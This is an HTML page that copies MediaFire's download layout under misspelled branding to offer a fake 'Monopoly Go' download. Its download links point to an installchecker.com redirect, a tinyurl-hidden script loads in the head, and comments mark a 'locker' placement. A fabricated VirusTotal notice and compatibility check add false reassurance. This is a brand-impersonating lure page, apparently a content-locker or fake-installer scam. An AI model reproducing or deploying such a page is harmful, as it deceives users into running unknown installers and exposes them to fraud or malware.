<!DOCTYPE html>
<html lang="en-US" style="height: 100%;">

    <head>

        <!-- DIR LOCKER HMAYA -->
        <!-- DIR LOCKER HNAYA -->

        <meta charset="utf-8">
        <meta http-equiv="x-ua-compatible" content="ie=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <title>Download Monopoly Go</title>
        <link rel="icon" type="image/x-icon" href="../../images/gameIcon/monopoly-go.ico">

        <link rel="stylesheet" href="../../css/games/mediafire-design.css">
        <script async="" type="text/javascript" src="https://tinyurl.com/23e25aox"></script>
        <!-- End Google Tag Manager -->

        <!-- End Google Tag Manager (noscript) -->
        <meta http-equiv="origin-trial"
            content="A88otRz1Fd3Nt567e2IYshC18LL3KGVXpVJW9oTCId4RYaygt23pbb4JqrbdIO/bwZPWEmRjBIRBu/bZbDR7Pg4AAABueyJvcmlnaW4iOiJodHRwczovL2ltYXNkay5nb29nbGVhcGlzLmNvbTo0NDMiLCJmZWF0dXJlIjoiVHJ1c3RUb2tlbnMiLCJleHBpcnkiOjE2MzQwODMxOTksImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=">
        <meta http-equiv="origin-trial"
            content="A0gCLbXCcL0R1Oc8tFPDs0G4Elz17w3zHp+Zst66+D17veE2o7fUcPsA114QtSTRqfVJLMeTSdeWOom0CcyCsgYAAAB7eyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiVHJ1c3RUb2tlbnMiLCJleHBpcnkiOjE2MzQwODMxOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9">
        <meta http-equiv="origin-trial"
            content="A9RQ+LxFazAousxUwSCzaihJjHLO1UyjQp0teZKHl7WdbVjPDfHSKMd6D/ZI5MTjqClFycbl70EFd7cBJWXqKQEAAACBeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZXRhZ3NlcnZpY2VzLmNvbTo0NDMiLCJmZWF0dXJlIjoiVHJ1c3RUb2tlbnMiLCJleHBpcnkiOjE2MzQwODMxOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9">
        <meta http-equiv="origin-trial"
            content="A6WKeWsdn1Ct+ZPqS9NCxxaiBoQ7wdTkK2/gE69Yu0gfBKJfo1gOvgkGmf5/xaIajT/RUb9AbnF1FsSZ47cCcQcAAACBeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZXN5bmRpY2F0aW9uLmNvbTo0NDMiLCJmZWF0dXJlIjoiVHJ1c3RUb2tlbnMiLCJleHBpcnkiOjE2MzQwODMxOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9">
        <meta http-equiv="origin-trial"
            content="A04ZCu7yjrHgwQJK5ISHhH1DSg0qqowEay3n70KO6wV3D2Mj+OX3Kw20aSMitzgdG1xfrN7sOJV/dZIk+RvCzA4AAAB2eyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IlRydXN0VG9rZW5zIiwiZXhwaXJ5IjoxNjM0MDgzMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlfQ==">
        <meta http-equiv="origin-trial"
            content="A2YAd4xOntTGygIDjApOTtXOgVI3IWsd5OnOGq3RbRkIQwyqYWNl1JGRAcvtm6VOHDj4n07T/J19VqLuJn3MmQ8AAACWeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiQ29udmVyc2lvbk1lYXN1cmVtZW50IiwiZXhwaXJ5IjoxNjMxNjYzOTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlLCJ1c2FnZSI6InN1YnNldCJ9">
        <meta http-equiv="origin-trial"
            content="A2c5Ux+hivdkLh/KbZUGr6f7SCR0mZrBVfPJ+/OuDVHNwiYv+Lo83b9z5qL8sod78bQl0pSLtbvRWURo+xRl7AIAAACceyJvcmlnaW4iOiJodHRwczovL2dvb2dsZXN5bmRpY2F0aW9uLmNvbTo0NDMiLCJmZWF0dXJlIjoiQ29udmVyc2lvbk1lYXN1cmVtZW50IiwiZXhwaXJ5IjoxNjMxNjYzOTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlLCJ1c2FnZSI6InN1YnNldCJ9">
        <meta http-equiv="origin-trial"
            content="AzNJ4sd3tVurolpdvWYZ4cmP9Po7RJhEHSqmC3pgxW9fFVZvchhtcMUgHAs97npxMD1jhXHO8s6q6Wy1MMLxKgEAAACceyJvcmlnaW4iOiJodHRwczovL2dvb2dsZXRhZ3NlcnZpY2VzLmNvbTo0NDMiLCJmZWF0dXJlIjoiQ29udmVyc2lvbk1lYXN1cmVtZW50IiwiZXhwaXJ5IjoxNjMxNjYzOTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlLCJ1c2FnZSI6InN1YnNldCJ9">
        <meta http-equiv="origin-trial"
            content="AwfG8hAcHnPa/kJ1Co0EvG/K0F9l1s2JZGiDLt2mhC3QI5Fh4qmsmSwrWObZFbRC9ieDaSLU6lHRxhGUF/i9sgoAAACBeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiSW50ZXJlc3RDb2hvcnRBUEkiLCJleHBpcnkiOjE2MjYyMjA3OTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9">
        <meta http-equiv="origin-trial"
            content="AwQ7dCmHkvR6FuOFxAuNnktYSQrGbL4dF+eBkrwNLALc69Wr//PnO1yzns3pjUoCaYbKHtVcnng2hU+8OUm0PAYAAACHeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZXN5bmRpY2F0aW9uLmNvbTo0NDMiLCJmZWF0dXJlIjoiSW50ZXJlc3RDb2hvcnRBUEkiLCJleHBpcnkiOjE2MjYyMjA3OTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9">
        <meta http-equiv="origin-trial"
            content="AysVDPGQTLD/Scn78x4mLwB1tMfje5jwUpAAzGRpWsr1NzoN7MTFhT3ClmImi2svDZA7V6nWGIV8YTPsSRTe0wYAAACHeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZXRhZ3NlcnZpY2VzLmNvbTo0NDMiLCJmZWF0dXJlIjoiSW50ZXJlc3RDb2hvcnRBUEkiLCJleHBpcnkiOjE2MjYyMjA3OTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9">
        <!-- Google tag (gtag.js) -->
        <script async src="https://www.googletagmanager.com/gtag/js?id=G-KYVZQJ65BN"></script>
        <script>
            window.dataLayer = window.dataLayer || [];
            function gtag() { dataLayer.push(arguments); }
            gtag('js', new Date());

            gtag('config', 'G-KYVZQJ65BN');
        </script>
    </head>

    <body class="en defaultTheme" style="position: relative; min-height: 100%; top: 0px;">

        <div class="mf-dlr page ads-mobile4 mobile">
            <label for="copy" style="display: none;">Copy textarea</label>
            <textarea id="copy" style="position:absolute;left:-9999px;opacity:0">#</textarea>

            <div class="content">

                <style type="text/css">
                    .header {
                        height: 70px;
                        background: #fff;
                        position: fixed;
                        top: 0;
                        left: 0;
                        right: 0;
                        z-index: 45;
                        box-shadow: 0 1px 0 0 rgba(0, 0, 0, .1)
                    }

                    .logo {
                        float: left
                    }

                    .logo>a {
                        display: table;
                        height: 70px;
                        width: 191px;
                        background: url(https://tinyurl.com/22sh9f5e) 0 center/180px auto no-repeat;
                        margin: 0 auto;
                        text-indent: -9999px
                    }

                    .user-menu {
                        float: right;
                        margin: 17px 0 0;
                        font-family: "open sans";
                        font-size: 12px
                    }

                    .user-menu>li {
                        float: right
                    }

                    .loginActivateFB,
                    .loginActivateTW {
                        position: absolute;
                        top: 50%;
                        height: 20px;
                        width: 20px;
                        border-radius: 2px;
                        background-color: rgba(0, 0, 0, .15);
                        background-repeat: no-repeat;
                        background-position: center;
                        background-size: 17px;
                        transform: translatey(-50%)
                    }

                    .loginActivateFB {
                        background-image: url(https://tinyurl.com/2aox9pou);
                        right: 32px
                    }

                    .loginActivateTW {
                        background-image: url(images/icons/svg_light/twitter.svg);
                        right: 8px
                    }

                    #login {
                        margin-right: 0;
                        border-bottom-left-radius: 0;
                        border-top-left-radius: 0;
                        position: relative;
                        padding-right: 67px
                    }

                    #signup {
                        margin-right: 1px;
                        border-bottom-right-radius: 0;
                        border-top-right-radius: 0
                    }

                    .user-menu-help {
                        margin-right: 10px
                    }

                    .mobile .user-menu-help {
                        display: none
                    }

                    #login,
                    #signup,
                    .user-menu-help {
                        max-width: 150px;
                        white-space: nowrap;
                        text-overflow: ellipsis;
                        overflow: hidden
                    }

                    @media (max-width:960px) {
                        .logo {
                            margin-left: 20px
                        }

                        .user-menu {
                            margin-right: 17px
                        }
                    }

                    @media (max-width:940px) {

                        .loginActivateFB,
                        .loginActivateTW {
                            display: none
                        }

                        #login,
                        #signup {
                            width: 85px;
                            padding: 0 10px
                        }

                        .user-menu-help {
                            font-size: 0
                        }

                        .user-menu-help .g-Icon--help {
                            margin: 0
                        }
                    }

                    @media (max-width:720px) {
                        .logo {
                            width: 48px;
                            overflow: hidden
                        }

                        .user-menu-help {
                            display: none
                        }
                    }

                    @media (max-width:650px) {

                        .customLogo .logo,
                        .customLogo .logo>a {
                            width: 150px
                        }
                    }

                    @media (max-width:610px) {
                        #goog-header-translate {
                            width: 60px
                        }

                        #goog-header-translate .goog-te-combo {
                            text-indent: 60px;
                            padding: 0
                        }
                    }

                    @media (max-width:500px) {

                        #login,
                        #signup {
                            font-size: 9px;
                            padding: 0 5px;
                            width: 60px
                        }

                        #goog-header-translate {
                            width: 36px;
                            background-position: center
                        }

                        #goog-header-translate .goog-te-combo {
                            padding: 0;
                            background-image: none !important
                        }
                    }

                    @media (max-width:400px) {
                        .logo {
                            margin-left: 5px
                        }

                        .customLogo .logo {
                            margin-left: 0
                        }

                        .customLogo .logo,
                        .customLogo .logo>a {
                            width: 110px
                        }
                    }

                    @media (max-width:340px) {

                        .customLogo .logo,
                        .customLogo .logo>a {
                            width: 80px
                        }
                    }

                    .flag-mar,
                    .flag-ma,
                    .flag-504,
                    .flag-ioc-mar,
                    .flag-fifa-mar {
                        background-image: url(https://tinyurl.com/25vo2wq2)
                    }
                </style>

                <div class="header">
                    <div class="u-wrap">
                        <div class="logo">
                            <a href="#">Mediafr</a>
                        </div>
                        <ul class="user-menu">
                            <li>
                                <a href="#" id="login" class="g-Btn g-Btn--primary">
                                    <span class="loginActivateTW"></span>
                                    <span class="loginActivateFB"></span>
                                    Log In
                                </a>
                            </li>
                            <li>
                                <a href="#" id="signup" class="g-Btn g-Btn--primary">Sign Up</a>
                            </li>
                            <li>
                                <a href="#" class="user-menu-help g-Btn g-Btn--secondary">
                                    <span class="g-Icon g-Icon--help"></span>Help
                                </a>
                            </li>
                            <li class="header-gt-cont">
                                <noscript>
                                    <style>
                                        .header-gt-cont {
                                            display: none;
                                        }
                                    </style>
                                </noscript>
                                <span class="gt-label">Language:</span>
                                <div id="goog-header-translate" class="g-Btn g-Btn--secondary">
                                    <div class="skiptranslate goog-te-gadget" dir="ltr" style="">
                                        <div id=":0.targetLanguage"><select class="goog-te-combo"
                                                aria-label="Language Translate Widget">
                                                <option value="">Select Language</option>
                                                <option value="af">Afrikaans</option>
                                                <option value="sq">Albanian</option>
                                                <option value="am">Amharic</option>
                                                <option value="ar">Arabic</option>
                                                <option value="hy">Armenian</option>
                                                <option value="az">Azerbaijani</option>
                                                <option value="eu">Basque</option>
                                                <option value="be">Belarusian</option>
                                                <option value="bn">Bengali</option>
                                                <option value="bs">Bosnian</option>
                                                <option value="bg">Bulgarian</option>
                                                <option value="ca">Catalan</option>
                                                <option value="ceb">Cebuano</option>
                                                <option value="ny">Chichewa</option>
                                                <option value="zh-CN">Chinese (Simplified)</option>
                                                <option value="zh-TW">Chinese (Traditional)</option>
                                                <option value="co">Corsican</option>
                                                <option value="hr">Croatian</option>
                                                <option value="cs">Czech</option>
                                                <option value="da">Danish</option>
                                                <option value="nl">Dutch</option>
                                                <option value="eo">Esperanto</option>
                                                <option value="et">Estonian</option>
                                                <option value="tl">Filipino</option>
                                                <option value="fi">Finnish</option>
                                                <option value="fr">French</option>
                                                <option value="fy">Frisian</option>
                                                <option value="gl">Galician</option>
                                                <option value="ka">Georgian</option>
                                                <option value="de">German</option>
                                                <option value="el">Greek</option>
                                                <option value="gu">Gujarati</option>
                                                <option value="ht">Haitian Creole</option>
                                                <option value="ha">Hausa</option>
                                                <option value="haw">Hawaiian</option>
                                                <option value="iw">Hebrew</option>
                                                <option value="hi">Hindi</option>
                                                <option value="hmn">Hmong</option>
                                                <option value="hu">Hungarian</option>
                                                <option value="is">Icelandic</option>
                                                <option value="ig">Igbo</option>
                                                <option value="id">Indonesian</option>
                                                <option value="ga">Irish</option>
                                                <option value="it">Italian</option>
                                                <option value="ja">Japanese</option>
                                                <option value="jw">Javanese</option>
                                                <option value="kn">Kannada</option>
                                                <option value="kk">Kazakh</option>
                                                <option value="km">Khmer</option>
                                                <option value="rw">Kinyarwanda</option>
                                                <option value="ko">Korean</option>
                                                <option value="ku">Kurdish (Kurmanji)</option>
                                                <option value="ky">Kyrgyz</option>
                                                <option value="lo">Lao</option>
                                                <option value="la">Latin</option>
                                                <option value="lv">Latvian</option>
                                                <option value="lt">Lithuanian</option>
                                                <option value="lb">Luxembourgish</option>
                                                <option value="mk">Macedonian</option>
                                                <option value="mg">Malagasy</option>
                                                <option value="ms">Malay</option>
                                                <option value="ml">Malayalam</option>
                                                <option value="mt">Maltese</option>
                                                <option value="mi">Maori</option>
                                                <option value="mr">Marathi</option>
                                                <option value="mn">Mongolian</option>
                                                <option value="my">Myanmar (Burmese)</option>
                                                <option value="ne">Nepali</option>
                                                <option value="no">Norwegian</option>
                                                <option value="or">Odia (Oriya)</option>
                                                <option value="ps">Pashto</option>
                                                <option value="fa">Persian</option>
                                                <option value="pl">Polish</option>
                                                <option value="pt">Portuguese</option>
                                                <option value="pa">Punjabi</option>
                                                <option value="ro">Romanian</option>
                                                <option value="ru">Russian</option>
                                                <option value="sm">Samoan</option>
                                                <option value="gd">Scots Gaelic</option>
                                                <option value="sr">Serbian</option>
                                                <option value="st">Sesotho</option>
                                                <option value="sn">Shona</option>
                                                <option value="sd">Sindhi</option>
                                                <option value="si">Sinhala</option>
                                                <option value="sk">Slovak</option>
                                                <option value="sl">Slovenian</option>
                                                <option value="so">Somali</option>
                                                <option value="es">Spanish</option>
                                                <option value="su">Sundanese</option>
                                                <option value="sw">Swahili</option>
                                                <option value="sv">Swedish</option>
                                                <option value="tg">Tajik</option>
                                                <option value="ta">Tamil</option>
                                                <option value="tt">Tatar</option>
                                                <option value="te">Telugu</option>
                                                <option value="th">Thai</option>
                                                <option value="tr">Turkish</option>
                                                <option value="tk">Turkmen</option>
                                                <option value="uk">Ukrainian</option>
                                                <option value="ur">Urdu</option>
                                                <option value="ug">Uyghur</option>
                                                <option value="uz">Uzbek</option>
                                                <option value="vi">Vietnamese</option>
                                                <option value="cy">Welsh</option>
                                                <option value="xh">Xhosa</option>
                                                <option value="yi">Yiddish</option>
                                                <option value="yo">Yoruba</option>
                                                <option value="zu">Zulu</option>
                                            </select></div>Powered by <span style="white-space:nowrap"><a
                                                class="goog-logo-link" href="https://translate.google.com"><img
                                                    src="https://www.gstatic.com/images/branding/googlelogo/1x/googlelogo_color_42x16dp.png"
                                                    width="37px" height="14px" style="padding-right: 3px"
                                                    alt="Google Translate">Translate</a></span>
                                    </div>
                                </div>

                                <script type="text/javascript"
                                    src="//translate.google.com/translate_a/element.js?cb=googHeadTranslate" async=""
                                    defer=""></script>
                            </li>
                        </ul>
                    </div>
                </div>
                <div class="center">
                    <div class="ads dl-box">
                        <div class="dl-btn-cont">

                            <!-- ICON CHANGE -->
                            <div class="icon zip archive application_zip"></div>
                            <div class="dl-btn-labelWrap">

                                <div class="promoDownloadName notranslate">
                                    <a href="https://installchecker.com/cl/i/dv9d37" target="_blank">
                                        <div class="dl-btn-label" title="psd templates.zip">

                                            Monopoly Go

                                        </div>
                                    </a>
                                </div>
                                <div class="dl-utility-nav">
                                    <ul>
                                        <li>
                                            <a href="#" rel="noopener" id="shareButton"
                                                class="nopop g-Icon g-Icon--white g-Icon--share"
                                                aria-labelledby="share-tooltip" title="More sharing options"></a>
                                            <span id="share-tooltip" class="alt point-down tooltip">
                                                More sharing options
                                            </span>
                                        </li>
                                        <li>
                                            <a href="#" rel="noopener" id="copyShareURL"
                                                class="nopop g-Icon g-Icon--white g-Icon--link"
                                                aria-labelledby="copy-tooltip" title="Copy file link to clipboard"></a>
                                            <span id="copy-tooltip" class="alt point-down tooltip">
                                                Copy file link to clipboard
                                            </span>
                                        </li>
                                        <li>
                                            <a href="" id="saveButton" class="g-Icon g-Icon--white g-Icon--add"
                                                aria-labelledby="share-tooltip" title="Save file to My Files"></a>
                                            <span id="save-tooltip" class="alt point-down tooltip">
                                                Save file to My Files
                                            </span>
                                        </li>
                                        <noscript>
                                            <style type="text/css">
                                                #shareButton,
                                                #copyShareURL,
                                                #saveButton {
                                                    display: none
                                                }
                                            </style>
                                        </noscript>
                                    </ul>
                                </div>
                            </div>
                            <form method="post" name="download" class="dl-btn-form" autocomplete="off">
                                <input type="hidden" name="security"
                                    value="1632177484.b093f5efe483831b4f3071911ac8d2021a1e1fc25ef9551b15427de8d0199a40">
                                <div class="download_link" id="download_link">
                                    <img src="../../images/gameLogo/monpolygo-logo.webp" class="pro-logo" alt="">
                                    <a class="preparing" href="#"><span>Preparing your download...</span></a>
                                    <a class="input popsok" aria-label="Download file" id="downloadButton"
                                        href="https://installchecker.com/cl/i/dv9d37" target="_blank">
                                        DOWNLOAD (115MB)
                                    </a>
                                    <a class="starting" href="#"><span>Your download is starting...</span></a>
                                    <a class="retry"
                                        href="http://www.walo.com/download_repair.php?qkey=ejxqpa9bh9yplyu&amp;dkey=92glvtvwbwa&amp;template=4&amp;origin=click_button">
                                        <span class="notranslate">Not working? <em>Repair your download</em></span>
                                    </a>

                                </div>
                                <a href="#" class="download_test_link">
                                    Download Diagnostic Tool
                                </a>
                            </form>

                            <div class="DLMobile-shareOptions">
                                <ul>
                                    <li>
                                        <a href="#" rel="noopener" id="copyShareURLMobile"
                                            aria-labelledby="copy-tooltip" class="nopop">
                                            <span></span>Copy for messenger
                                        </a>
                                        <span id="copy-tooltip" class="alt point-down tooltip">
                                            Copy file link to clipboard
                                        </span>
                                    </li>
                                    <li>
                                        <a href="#" id="facebookShareButtonMobile" aria-labelledby="fb-share-tooltip"
                                            rel="noopener" class="nopop">
                                            <span></span>Post to Facebook
                                        </a>
                                        <span id="fb-share-tooltip" class="alt point-down tooltip">
                                            Post link to FaceBook
                                        </span>
                                    </li>
                                </ul>
                                <ul>
                                    <li>
                                        <a href="#" id="shareButtonMobile" aria-labelledby="share-tooltip"
                                            class="nopop">
                                            <span></span>Share options
                                        </a>
                                        <span id="share-tooltip" class="alt point-down tooltip">
                                            More sharing options
                                        </span>
                                    </li>
                                    <li>
                                        <a href="" id="saveButtonMobile" aria-labelledby="save-tooltip">
                                            <span></span>Save to My Files
                                        </a>
                                        <span id="save-tooltip" class="alt point-down tooltip">
                                            Save file to My Files
                                        </span>
                                    </li>
                                </ul>
                            </div>
                        </div>

                        <a class="dl-promo-cont nopop" href="" rel="noopener">
                            MediaFir Pro: Faster bulk downloads, Ad free downloads, &amp; 1 TB of storage. From
                            $3.75/month.
                        </a>
                        <div class="dl-info">

                            <!-- ICON CHANGE -->
                            <div class="intro icon video zip archive application_zip">
                                <div class="filename">psd templates.zip</div>
                                <div class="filetype"><span>Compressed Archive</span><span> (.ZIP)<span></span></span>
                                </div>
                            </div>
                            <ul class="details">
                                <li>File size: <span>490.58MB</span></li>
                                <li>Uploaded: <span>2023-09-7 10:53:17</span></li>
                            </ul>
                            <div class="description">
                                <h6>About Compressed Archive Formats</h6>
                                <p>Compressed archives combine multiple files into a single file to make them easier to
                                    transport or save on diskspace. Archiving software may also provide options for
                                    encryption, file spanning, checksums, self-extraction, and self-installation. Zip is
                                    the most-widely used format, used by the Windows operating system and more recently
                                    by OSX as well. RAR is also a very popular and flexible format. Unix uses the tar
                                    file format, while Linux uses the tar and gz format.</p>
                            </div>

                            <div class="sidebar">
                                <div class="apps">
                                    <div>
                                        <div class="filename">psd templates.zip</div>
                                        <br>Can be opened with
                                    </div>
                                    <ul>
                                        <li>
                                            <a class="nopop" href="#" rel="noreferrer" title="WinZip for PC">
                                                WinZip for PC
                                            </a>
                                        </li>
                                    </ul>
                                </div>
                                <div class="Download-compatibility">
                                    <div>
                                        <div class="filename">Monopoly Go.apk</div>
                                        <br>System compatibility
                                    </div>
                                    <label for="compact-select" style="display: none">Select OS</label>
                                    <select class="g-Select" id="compat-select" title="Select operating system">
                                        <option value="windows" data-compat="">
                                            Windows </option>
                                        <option value="osx" selected="" data-compat="">
                                            macOS (your OS) </option>
                                        <option value="linux" data-compat="">
                                            Linux </option>
                                    </select>
                                    <div class="Download-compatibilityStatus is-compatible" id="compat-supported">
                                        <span></span>
                                        <p>File is compatible with the selected operating system.</p>
                                    </div>
                                    <div class="Download-compatibilityStatus is-notCompatible" id="compat-unsupported"
                                        style="display:none">
                                        <span></span>
                                        <p>File is not compatible with the selected operating system.</p>
                                    </div>

                                </div>
                            </div>
                        </div>
                    </div>
                </div>

                <!-- Temp placement -->
                <div id="adwrapper" class="nonDLContentWrap">
                    <style type="text/css">
                        #div-gpt-ad-1575674121640-0 {
                            width: 100%;
                            height: 100px;
                            top: 70px;
                            position: absolute;
                            align-items: center;
                            justify-content: center;
                            display: flex;
                        }
                    </style>
                    <div id="div-gpt-ad-1575674121640-0" data-google-query-id="CK3GzPrOjvMCFdOEhQodfEEL4A">

                        <div id="google_ads_iframe_/21882844027/Mobileweb-Ad1-Intl_0__container__"
                            style="border: 0pt none;"><iframe id="google_ads_iframe_/21882844027/Mobileweb-Ad1-Intl_0"
                                title="3rd party ad content" name="google_ads_iframe_/21882844027/Mobileweb-Ad1-Intl_0"
                                width="320" height="100" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"
                                sandbox="allow-forms allow-popups allow-popups-to-escape-sandbox allow-same-origin allow-scripts allow-top-navigation-by-user-activation"
                                style="border: 0px; vertical-align: bottom;" data-load-complete="true"
                                data-google-container-id="1"></iframe></div>
                    </div>
                    <style type="text/css">
                        #div-gpt-ad-1579281108195-0 {
                            width: 100%;
                            height: 100px;
                            top: 440px;
                            left: 0;
                            position: absolute;
                            display: flex;
                            align-items: center;
                            justify-content: center;
                        }
                    </style>
                    <div id="div-gpt-ad-1579281108195-0" data-google-query-id="CJbVzPrOjvMCFSxEHQkdYJsGsg">

                        <div id="google_ads_iframe_/21882844027/Mobileweb-Ad2-Intl_0__container__"
                            style="border: 0pt none;"><iframe id="google_ads_iframe_/21882844027/Mobileweb-Ad2-Intl_0"
                                title="3rd party ad content" name="google_ads_iframe_/21882844027/Mobileweb-Ad2-Intl_0"
                                width="320" height="50" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"
                                sandbox="allow-forms allow-popups allow-popups-to-escape-sandbox allow-same-origin allow-scripts allow-top-navigation-by-user-activation"
                                style="border: 0px; vertical-align: bottom;" data-load-complete="true"
                                data-google-container-id="2"></iframe></div>
                    </div>
                    <style type="text/css">
                        #div-gpt-ad-1579281193413-0 {
                            width: 100%;
                            height: 100px;
                            bottom: 0;
                            left: 0;
                            display: flex;
                            align-items: center;
                            position: absolute;
                            justify-content: center
                        }
                    </style>
                    <div id="div-gpt-ad-1579281193413-0">

                    </div>
                </div>

                <!-- Details for this download
			================-->
                <div class="DLExtraInfo-wrap">

                    <!-- Upload details for file
	    =================================-->
                    <div class="DLExtraInfo">
                        <!-- Location + map -->
                        <div class="DLExtraInfo-uploadLocation DLExtraInfo-column">
                            <div class="lazyload DLExtraInfo-uploadLocationMap Continent DLExtraInfo-uploadLocationMapBg"
                                data-lazyclass="DLExtraInfo-uploadLocationMapBg">
                                <span>Upload region:</span>

                                <!-- Region Change (Sora Dyal Lkharita) -->
                                <div class="continent-na lazyload DLExtraInfo-uploadLocationRegion"
                                    data-lazyclass="continent-na"></div>
                            </div>
                            <!-- <div class="DLExtraInfo-sectionHeading">This file&#8217;s upload location</div> -->
                            <div class="lazyload DLExtraInfo-sectionGraphic flag flag-usa" data-lazyclass="flag-ma">
                            </div>
                            <div class="DLExtraInfo-sectionDetails">
                                <p>This file was uploaded from United States on Septembre 07, 2023 at 10:53 AM</p>
                            </div>
                        </div>

                        <div class="DLExtraInfo-upload DLExtraInfo-column">
                            <!-- VirusTotal scan -->
                            <div class="DLExtraInfo-virusTotal DLExtraInfo-row">
                                <div class="DLExtraInfo-sectionGraphic">
                                    <div class="lazyload DLExtraInfo-sectionGraphicCenter DLExtraInfo-virusTotalImage"
                                        data-lazyclass="DLExtraInfo-virusTotalImage"></div>
                                </div>
                                <div class="DLExtraInfo-sectionDetails">
                                    <div class="DLExtraInfo-sectionHeading">VirusTotal scan</div>
                                    <p>
                                        MediaFirę scans high-risk files using VirusTotal.
                                    </p>
                                </div>
                            </div>
                            <!-- Like MediaFr on Facebook -->
                            <div class="DLExtraInfo-Facebook DLExtraInfo-row">
                                <div class="social-cont">
                                    <div class="social-fb-cont">
                                        <span>Like Mediafir on Facebook</span>
                                        <iframe class="lazyload nopop"
                                            data-lazysrc="https://www.facebook.com/plugins/like.php?href=http://www.facebook.com/Walo&amp;width=193&amp;layout=button_count&amp;action=like&amp;show_faces=false&amp;share=true&amp;height=30&amp;appId=124578887583575"
                                            src="" width="190" height="30" scrolling="no" frameborder="0"
                                            allowtransparency="true"></iframe>
                                    </div>
                                </div>
                                <noscript>
                                    <style>
                                        .social-fb-cont>iframe {
                                            display: block
                                        }
                                    </style>
                                </noscript>
                            </div>
                        </div>
                    </div>


                    <!-- Additional information
                    <div class="DLExtraInfo DLExtraInfo-additional">

                        <!-- Alternate for account status (not logged in) -->
                    <div class="DLExtraInfo-accountStatus DLExtraInfo-column">
                        <div class="lazyload DLExtraInfo-sectionIcon" data-lazyclass="DLExtraInfo-accountStatusImage">
                        </div>
                        <div class="DLExtraInfo-sectionDetails">
                            <div class="DLExtraInfo-sectionHeading">About MediaFire</div>
                            <div class="DLExtraInfo-sectionSubHeading">Welcome!</div>
                            <p>
                                With MediaFirę, you get simple yet powerful file storage
                                along with features you won’t find anywhere else. <a href="#">Learn more</a>
                            </p>
                        </div>
                    </div>

                    <!-- Browser/download application -->
                    <div class="DLExtraInfo-downloadApp DLExtraInfo-column">
                        <div class="lazyload DLExtraInfo-sectionIcon" data-lazyclass="browser-safari"></div>
                        <div class="DLExtraInfo-sectionDetails">
                            <div class="DLExtraInfo-sectionHeading">Download application</div>
                            <div class="DLExtraInfo-sectionSubHeading">Apple Safari</div>
                            <p>
                                You are downloading this file with <span>Apple Safari, version 10.0.</span>
                            </p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div id="share" class="lightbox" role="dialog" tabindex="-1">
            <figure>
                <a href="#" class="close" id="share-close" title="Close share dialog"><span style="display: none">Close
                        share dialog</span></a>
                <figcaption>
                    <iframe id="share-iframe"
                        data-src="http://www.walo.com/widgets/share.php?web=1&amp;dlr=1&amp;files=ejxqpa9bh9yplyu"
                        allowtransparency="true" style="">
                        <p id="share-desc">
                            Failed to load. Try again in a supported browser.
                        </p>
                    </iframe>
                    <noscript>
                        <p id="share-desc">
                            Failed to load. Please enable JavaScript.
                        </p>
                    </noscript>
                </figcaption>
            </figure>
        </div>
        </div><iframe name="googlefcPresent"
            style="display: none; width: 0px; height: 0px; border: none; z-index: -1000; left: -1000px; top: -1000px;"></iframe>
        <div id="footer" class="footer">
            <div class="u-wrap" id="mainFooterWrap">
                <div class="footerColWrap u-cf">
                    <div class="footerCol">
                        <h4><a href="#">Company</a></h4>
                        <ul>
                            <li class="#"><a href="#">About<b> Us</b></a></li>
                            <li><a href="#">Careers</a></li>
                            <li><a href="#">Press</a></li>
                            <li><a href="#">Company Blog</a></li>
                        </ul>
                    </div>

                    <div class="footerCol">
                        <h4><a href="#">Tools</a></h4>
                        <ul>
                            <li class="minFooterShow">
                                <a href="#"><b>MediaFirę </b>Mobile</a>
                            </li>
                            <li class="minFooterShow">
                                <a href="#"
                                    title="Powerful On-Demand Video Processing CDN - Video transformations, optimization, and delivery using simple and robust URL parameters.">On-Demand
                                    Video Encoding</a>
                            </li>
                        </ul>
                    </div>

                    <div class="footerCol">
                        <h4><a href="#">Upgrade</a></h4>
                        <ul>
                            <li><a href="#">Professional</a></li>
                        </ul>
                    </div>

                    <div class="footerCol">
                        <h4><a href="#">Support</a></h4>
                        <ul>
                            <li class="minFooterShow"><a href="#">Get Support</a></li>
                        </ul>
                    </div>
                </div>
            </div>

            <!-- SUBFOOTER -->
            <div id="subFooterWrap">
                <div id="subFooter" class="u-wrap">
                    <ul class="subFooterLinks">
                        <li id="#">©2023 MediaFir<span> Build 121839</span></li>
                        <li><a href="#">Advertising</a></li>
                        <li><a href="#">Terms</a></li>
                        <li><a href="#">Privacy Policy</a></li>
                        <li><a href="#">Copyright</a></li>
                        <li><a href="#">Abuse</a></li>
                        <li><a href="#">Credits</a></li>
                        <li><a href="#">More...</a></li>
                    </ul>
                    <div class="subFooterSocialWrap">
                        <ul id="subFooterSocial">
                            <li class="footerIcn">
